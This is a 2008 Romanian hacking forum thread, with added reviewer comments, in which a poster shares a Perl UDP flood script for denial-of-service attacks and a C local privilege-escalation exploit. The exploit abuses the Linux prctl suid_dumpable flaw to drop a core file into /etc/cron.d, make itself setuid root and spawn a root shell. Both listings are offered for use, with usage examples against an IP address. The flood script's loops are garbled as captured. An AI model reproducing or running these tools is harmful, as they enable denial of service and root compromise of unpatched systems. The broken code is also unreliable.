AlucardHao Posted March 26, 2008 Report Posted March 26, 2008 in sfarsit am reusit sa realizez si eu un mic script de ddos in pearl... e rudimentar; recunosc..... dar merge destul de bine
#!/usr/bin/perl
#####################################################
# udp flood.
#
# RstZone.
#
# --/AlucardHao
#####################################################
#
# Reviewer notes. The code is reproduced exactly as captured on the page;
# only line breaks and comments were added.
#
# - Arguments: <ip> <port> <seconds>. Port 0 selects a random destination
#   port per datagram; time 0 means no stop timer is started.
# - There is no `use strict` / `use warnings`, and the return values of
#   socket(), inet_aton() and send() are never checked, so every failure
#   is silent.
# - Traffic shape, for detection: one source sending a continuous stream of
#   UDP datagrams to a single address, either to one fixed port or spread
#   over ports 1..65500. send() is called with the literal 0 as its message,
#   so what goes on the wire is a one-byte payload regardless of $size.
# - The stop timer is a background shell running `killall -9 udp`. It
#   matches by process name rather than PID, so it SIGKILLs every process
#   named "udp" on the host, and stops this script only if it runs under
#   that name (the usage text calls it ddos.pl).
# - $time comes straight from @ARGV and is interpolated unvalidated into the
#   string passed to system().
use Socket;

# Exactly three arguments are required; otherwise print usage and exit 1.
$ARGC=@ARGV;
if ($ARGC !=3) {
    printf "$0 <ip-u> <port-u> <timp de executie>\n";
    printf "daca port = 0 inseamna ca exploitu ca ataci toate porturile\n";
    printf "daca timp de executie = 0; scriptu va rula la infinit\n\n";
    printf "exemplu de folosire:\n";
    printf "./ddos.pl 86.125.124.63 0 0 -----> va rula la infinit\n\n";
    printf "./ddos.pl 86.125.124.63 22 60 -----> va ataca portu 22 timp de 60 de secunde\n\n";
    exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

# Bareword handle `crazy`; protocol number 17 is UDP. The result of socket()
# is not checked.
socket(crazy, PF_INET, SOCK_DGRAM, 17);
# inet_aton() returns undef for a name it cannot resolve; not checked here.
$iaddr = inet_aton("$ip");

printf "-][-Attack Started-][- -][-Made By AlucardHao-][-****************************-][-Aquring External IP-][-***************-][-65500 Pentru a intrerupe scriptu apasati CTRL+C .. Atacul incepe-][-\n";

# Dispatch on (port, time): zero/non-zero port picks the random-port or
# fixed-port loop, non-zero time additionally starts the killall timer.
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto randpackets;
}

# NOTE(review): both loop headers below are incomplete as captured on this
# page and are reproduced unchanged.

# Fixed-port loop: sends to the port given on the command line.
# $rand is never assigned anywhere in this listing.
packets:
for ( {
    $size=$rand x $rand x $rand;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

# Random-port loop: picks a new destination port in 1..65500 before every
# send.
randpackets:
for ( {
    $size=$rand x $rand x $rand;
    $port=int(rand 65500) +1;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
Quote
AlucardHao Posted March 26, 2008 Author Report Posted March 26, 2008 bazandu-ma pe exploitu de prctl() facut de Tienns pentru fedora core 1 eu si cu un coleg de clasa am realizat acest script in c... care ofera shell de root ...noi am testat pe redhat ubuntu fedora knoppix astrumi morphis stryunx ... toate acestea avand versiunea kernelulu >=2.6.13
/******************************************
 * Linux >= 2.6.13 prctl() kernel exploit *
 *                                        *
 * (C) AlucarHao                          *
 *                                        *
 *                                        *
 ******************************************/
/*
 * Reviewer notes. The code is reproduced as captured on the page; only line
 * breaks and comments were added.
 *
 * Flow of the listing:
 *   1. When already running with effective uid 0 it execs /bin/sh.
 *   2. Otherwise it records its own path from /proc/self/exe, installs a
 *      SIGUSR1 handler that re-executes that path, raises RLIMIT_CORE,
 *      changes directory to /etc/cron.d and calls prctl(PR_SET_DUMPABLE, 2).
 *   3. It formats a cron entry into a global buffer, forks, and sends
 *      signal 11 to the child so the child dumps core in the current
 *      directory. Presumably the dump contains the buffer, since the child
 *      inherits a copy of the parent's globals.
 *   4. The cron entry, if cron accepts the dump as a crontab, makes the
 *      binary root-owned and setuid, removes the dump and signals the
 *      parent, which then re-executes itself and reaches step 1.
 *
 * Defensive view:
 *   - The precondition is a kernel that lets an unprivileged process set its
 *     dumpable flag to 2 ("suidsafe"); the listing itself treats a failing
 *     prctl() as "kernel not affected". Vendor kernel updates remove the
 *     precondition.
 *   - setrlimit() here cannot exceed an existing hard limit without
 *     privilege, so a hard RLIMIT_CORE of 0 for unprivileged accounts stops
 *     the dump; a kernel.core_pattern that points at a dedicated directory
 *     keeps dumps out of the process's working directory.
 *   - Indicators: a file named "core" appearing in /etc/cron.d, cron running
 *     chown/chmod on a path in a user-writable location, and a formerly
 *     user-owned executable becoming root:root with mode 4755.
 */
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>

#define CROND "/etc/cron.d"   /* directory the core file is dumped into */
#define BUFSIZE 1024

/* Soft and hard core-size limits requested by main(). */
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

/*
 * Text that must end up inside the core file. The first %s is filled with
 * "\n", which ends the leading '#' comment so the entry that follows starts
 * on its own line. The remaining arguments are the binary's path (twice),
 * the path of the core file and the parent's pid.
 */
char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

char cronstring[BUFSIZE];   /* formatted cron entry */
char fname[BUFSIZE];        /* path of this executable, from /proc/self/exe */
struct timeval te;

/* SIGUSR1 handler: re-executes this binary (the signal number is unused). */
void sh(int sn) {
    execl(fname, fname, (char *) NULL);
}

int main(int argc, char *argv[]) {
    int nw, pid;

    /* Second run: the binary is already setuid root, so start a shell.
     * execl() only returns on failure. */
    if (geteuid() == 0) {
        printf("[+] obtinerea de rootshell\n");
        setuid(0);
        setgid(0);
        if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
            perror("[-] execle");
            return 1;
        }
    }

    printf("\\suidsafe exploit/\n\n(C) AlucardHao\n\n");

    /* Resolve our own path; a failure is reported but execution continues. */
    if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
        perror("[-] readlink");
        printf("Asta nu e fatal, rescrie exploitul\n");
    }

    if (signal(SIGUSR1, sh) == SIG_ERR) {
        perror("[-] signal");
        return 1;
    }
    printf("[+] Instaleaza handler-ul de semnal\n");

    /* Ask for unlimited core files; the return value is not checked. */
    setrlimit(RLIMIT_CORE, &myrlimit);

    /* The child inherits this working directory. */
    if (chdir(CROND) == -1) {
        perror("[-] chdir");
        return 1;
    }

    /* The call the whole listing depends on: dumpable mode 2 requested by an
     * unprivileged process. A patched kernel is expected to fail here. */
    if (prctl(PR_SET_DUMPABLE, 2) == -1) {
        perror("[-] prtctl");
        printf("Versiunea de kernel e >= 2.6.13 ?\n");
        return 1;
    }
    printf("[+] Sunt suidsafe!\n");

    /* Build the cron entry in a global so that it is part of process memory. */
    nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
    if (nw >= sizeof(cronstring)) {
        printf("[-] cronstring is too small\n");
        return 1;
    }
    printf("[+] String malitios implementat\n");

    if ((pid=fork()) == -1) {
        perror("[-] fork");
        return 1;
    }
    if (pid == 0) {
        /* Child: only waits to be signalled by the parent. */
        sleep(120);
        exit(0);
    }

    /* Parent: signal 11 (SIGSEGV) makes the child dump core. */
    printf("[+] Segmentation fault child\n");
    if (kill(pid, 11) == -1) {
        perror("[-] kill");
        return 1;
    }

    /* Prints the number of seconds left until the next minute boundary. */
    if (gettimeofday(&te, NULL) == 0)
        printf("[+] In asteptarea exploitului de a reusi (~%ld seconds)\n", 60 - (te.tv_sec%60));

    /* If SIGUSR1 has not arrived within 120 seconds, report failure. */
    sleep(120);
    printf("[-] Pare se ca exploitul a dat gres\n");
    return 1;
}
Quote
amprenta Posted March 26, 2008 Report Posted March 26, 2008 Asta ii taticu udp.pl, macar schimba numele variabilelor. killall -9 udp va mai avea efect? Quote
AlucardHao Posted March 26, 2008 Author Report Posted March 26, 2008 da ... killall -9 udp va avea efect... Quote
Vhaerun Posted March 26, 2008 Report Posted March 26, 2008 PEARL is usually written capitalized, and should not be confused with Perl. Quote